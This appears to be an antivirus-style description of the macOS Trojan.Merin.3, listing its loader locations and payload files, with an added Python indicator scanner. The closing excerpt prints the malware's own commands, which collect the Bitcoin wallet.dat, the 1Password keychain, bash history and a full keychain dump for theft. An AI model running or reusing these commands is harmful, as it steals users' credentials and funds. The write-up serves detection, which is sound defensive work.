A Trojan targeting Mac OS. Once the infected application is downloaded and run, Trojan.Merin.3 executes a special script that launches the Trojan’s loader. The loader is installed in one of the following folders of the user’s home directory:
- Library/evoCam4
- Library/Manager
- Library/Pixel_mator
under the name eCamd or twitterd.
The loader downloads the bin.bop archive from one of several FTP servers. The archive contains Bitcoin-related files and the Trojan’s main module:
- DiabloMiner
- acab.sh
- fxagent
- kc_dump.sh
- kcd.scpt
- kd.sh
- launch.sh
- mids.sh
- p_start.sh
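A host check for the persistence folders, loader names and archive contents listed above, added here as an example (it is not part of the original description and not code from the Trojan or the vendor). It assumes a standard macOS layout with home directories under /Users; the sample layout it builds is constructed from placeholder files for a dry run.

```python
import tempfile
from pathlib import Path

# Loader folders (relative to a home directory) and loader names from the description above.
LOADER_DIRS = ("Library/evoCam4", "Library/Manager", "Library/Pixel_mator")
LOADER_NAMES = {"eCamd", "twitterd"}
# The archive and the files it unpacks, also from the description.
PAYLOAD_NAMES = {"bin.bop", "DiabloMiner", "acab.sh", "fxagent", "kc_dump.sh",
                 "kcd.scpt", "kd.sh", "launch.sh", "mids.sh", "p_start.sh"}


def scan_home(home: Path) -> dict[str, list[str]]:
    """Return home-relative paths of loader and payload indicators found in one home directory."""
    hits: dict[str, list[str]] = {"loader": [], "payload": []}
    for rel in LOADER_DIRS:
        folder = home / rel
        if not folder.is_dir():
            continue  # folder absent: nothing to report for it
        for entry in sorted(folder.iterdir()):
            if entry.name in LOADER_NAMES:
                hits["loader"].append(str(entry.relative_to(home)))
            elif entry.name in PAYLOAD_NAMES:
                hits["payload"].append(str(entry.relative_to(home)))
    return hits


def scan_all_users(users_root: Path = Path("/Users")) -> dict[str, dict[str, list[str]]]:
    """Scan every home directory below users_root; only homes with at least one hit are returned."""
    results: dict[str, dict[str, list[str]]] = {}
    homes = sorted(p for p in users_root.iterdir() if p.is_dir()) if users_root.is_dir() else []
    for home in homes:
        hits = scan_home(home)
        if hits["loader"] or hits["payload"]:
            results[home.name] = hits
    return results


def build_sample_users_root() -> Path:
    """Constructed layout for a dry run (placeholder files, not malware): one home named 'demo'."""
    root = Path(tempfile.mkdtemp(prefix="merin_demo_"))
    home = root / "demo"
    (home / "Library/evoCam4").mkdir(parents=True)
    (home / "Library/evoCam4/eCamd").write_text("placeholder loader\n")
    (home / "Library/evoCam4/launch.sh").write_text("placeholder script\n")
    (home / "Library/Manager").mkdir(parents=True)  # an empty folder alone is not a hit
    (home / "Library/Pixel_mator").mkdir(parents=True)
    (home / "Library/Pixel_mator/readme.txt").write_text("benign\n")  # unrelated name: no hit
    (root / "clean").mkdir()  # second home with nothing in it: omitted from results
    return root


if __name__ == "__main__":
    print(scan_all_users(build_sample_users_root()))  # dry run on the constructed sample
```

Call scan_all_users() with no argument on a Mac to check the real /Users tree; a hit on any listed name warrants pulling the file for analysis rather than deleting it outright.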
The Trojan’s main module can steal user passwords, digital wallet data, and the bash command history (.bash_history) and send this data to the remote command and control server.
The module can execute the following commands (excerpt):
...
uuencode $HOME/Library/Application\ Support/Bitcoin/wallet.dat xyz >> $D_FILE
...
zip -X -r key.zip $HOME/Library/Application\ Support/1Password/1Password.agilekeychain > /dev/null
...
cat "$HOME/.bash_history" >> $D_FILE
...
security dump-keychain -d > s_dump.txt